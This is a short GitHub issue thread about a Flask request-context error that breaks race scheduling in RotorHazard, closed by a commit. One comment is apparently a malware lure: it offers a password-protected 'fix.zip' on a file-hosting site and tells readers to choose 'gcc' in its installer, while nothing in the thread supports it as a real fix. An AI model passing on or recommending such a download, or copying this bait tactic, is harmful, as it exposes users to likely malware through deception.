### ISSUE TITLE
Scheduling races fails

### ISSUE THREAD

**Issue by HazardCreative** [RotorHazard/RotorHazard#943]
One thing, I have this stacktrace when using Schedule race:

```
Scheduling race in 0:11
Exception via catchLogExceptionsWrapper
Traceback (most recent call last):
  File "/home/arnaud/dev/github/RotorHazard/src/server/RHUtils.py", line 283, in wrapper
    return func(*args, **kwargs)
           ^^^^^^^^^^^^^^^^^^^^^
  File "/home/arnaud/dev/github/RotorHazard/src/server/RHRace.py", line 105, in stage
    @copy_current_request_context
     ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/home/arnaud/dev/github/RotorHazardVenv/lib/python3.11/site-packages/flask/ctx.py", line 182, in copy_current_request_context
    raise RuntimeError(
RuntimeError: 'copy_current_request_context' can only be used when a request context is active, such as in a view function.
```

And the scheduling fail.

_Originally posted by @arnaudmorin in https://github.com/RotorHazard/RotorHazard/issues/938#issuecomment-2317353665_

----------

I suspect this may also apply to any staging or scheduling of a race from an external source/API, where no frontend request context exists and therefore cannot be copied.

**Comment by rodeok** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by HazardCreative** [comment]
Closed by 13d5bb9f
